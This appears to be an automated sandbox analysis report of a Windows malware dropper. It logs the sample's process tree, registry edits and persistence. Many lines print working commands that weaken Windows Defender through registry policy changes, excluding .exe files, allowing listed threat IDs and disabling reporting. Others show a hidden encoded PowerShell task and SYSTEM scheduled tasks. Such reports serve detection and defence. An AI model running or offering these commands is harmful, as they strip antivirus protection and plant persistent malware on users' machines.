Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt"
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 
Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\System32\gpupdate.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp
Source: classification engineClassification label: mal88.evad.winEXE@90/15@0/0
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeMutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6624:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.ini
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exeStatic file information: File size 7604002 > 1048576

Data Obfuscation

Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00411360 push ecx; mov dword ptr [esp], ecx1_2_00411361
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00413954 push eax; ret 1_2_00413972
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00413CC0 push eax; ret 1_2_00413CEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FF9A5642625 push eax; retf 24_2_00007FF9A5642609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00E4ECA2 push es; ret 31_2_00E4ECB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067D6020 push es; ret 31_2_067D6030
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067D28EF push es; ret 31_2_067D28F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067DFFA0 push es; ret 31_2_067DFFB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D2780 push es; ret 31_2_068D2790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6780 push es; ret 31_2_068D6790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D47B2 push es; ret 31_2_068D47C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D87F0 push es; ret 31_2_068D8800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D0710 push es; ret 31_2_068D0720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6580 push es; ret 31_2_068D6590
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D4550 push es; ret 31_2_068D4560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D2570 push es; ret 31_2_068D2580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA292 push es; ret 31_2_068DA2A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA2B2 push es; ret 31_2_068DA2C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA270 push es; ret 31_2_068DA2C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D03B0 push es; ret 31_2_068D03C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D4301 push es; ret 31_2_068D4310
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6351 push es; ret 31_2_068D6360
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D8370 push es; ret 31_2_068D8380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA0D0 push es; ret 31_2_068DA100
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D21F0 push es; ret 31_2_068D2200
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D8111 push es; ret 31_2_068D8120
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DE111 push es; ret 31_2_068DE120
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6172 push es; ret 31_2_068D6180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D8EE0 push es; ret 31_2_068D8EF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D4F90 push es; ret 31_2_068D4FA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6FD1 push es; ret 31_2_068D6FE0
Source: file.exeStatic PE information: section name: .sxdata
Source: Install.exe.1.drStatic PE information: section name: .sxdata
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00418320

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeFile created: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.job
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
